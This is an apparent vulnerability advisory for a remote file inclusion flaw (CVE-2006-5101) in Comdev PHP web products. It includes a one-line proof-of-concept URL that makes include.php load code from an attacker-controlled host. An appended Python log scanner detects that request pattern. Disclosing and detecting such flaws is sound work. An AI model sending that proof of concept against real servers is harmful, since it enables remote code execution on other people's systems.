Credit:
The information has been provided by OSVDB.
The original articles can be found at:
http://www.osvdb.org/
Vulnerable Systems:
* Comdev FAQ Support versions 3.1 and 4.1
* Comdev Events Calendar versions 3.1 and 4.1
* Comdev Photo Gallery versions 3.1 and 4.1
* Comdev News Publisher versions 3.1 and 4.1
* Comdev Web Blogger versions 3.1 and 4.1
* Comdev CSV Importer versions 3.1 and 4.1
* Comdev Guestbook versions 3.1 and 4.1
* Comdev Newsletter versions 3.1 and 4.1
* Comdev Links Directory versions 3.1 and 4.1
* Comdev eCommerce versions 3.1 and 4.1
* Comdev Customer Helpdesk versions 3.1 and 4.1
* Comdev Contact Form versions 3.1 and 4.1
* Comdev Vote Caster versions 3.1 and 4.1
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
CVE Information:
CVE-2006-5101
Proof of concept:
http://[target]/include.php?path["docroot"]=http://[attacker]
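
A defender-side check for the request shape in the proof of concept above, added here as an example and not part of the original advisory: it scans access-log lines for requests to include.php in which a path[...] parameter carries a remote URL. The combined log format, the sample lines and the function names are assumptions, and matching any subscript of path and the ftp scheme goes beyond the single case shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter name from the advisory's proof of concept: path["docroot"].
# Any subscript of "path" is treated as suspect; that widening is an assumption.
PATH_PARAM = re.compile(r'^path\[.*\]$', re.IGNORECASE)
# Value that would point a PHP include at a remote resource.
REMOTE_VALUE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)
# Request portion of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_rfi_attempt(request_target):
    """True if the request hits include.php with path[...] set to a remote URL."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/include.php"):
        return False
    # parse_qsl percent-decodes names and values, so path%5B%22docroot%22%5D
    # is compared in the same form as the literal path["docroot"].
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if PATH_PARAM.match(name) and REMOTE_VALUE.match(value):
            return True
    return False

def scan(log_lines):
    """Return the log lines whose request matches the advisory's pattern."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if m and is_rfi_attempt(m.group(1)):
            hits.append(line)
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2006:10:00:01 +0000] "GET /include.php?path[%22docroot%22]=http://198.51.100.7/ HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Oct/2006:10:00:02 +0000] "GET /include.php?path%5Bdocroot%5D=HTTP%3A%2F%2F198.51.100.7%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Oct/2006:10:00:03 +0000] "GET /include.php?page=faq HTTP/1.1" 200 2048',
    '192.0.2.13 - - [01/Oct/2006:10:00:04 +0000] "GET /index.php?path[docroot]=http://198.51.100.7/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string. With register_globals on, the same variable can also be supplied in a POST body or a cookie, which this scan does not see.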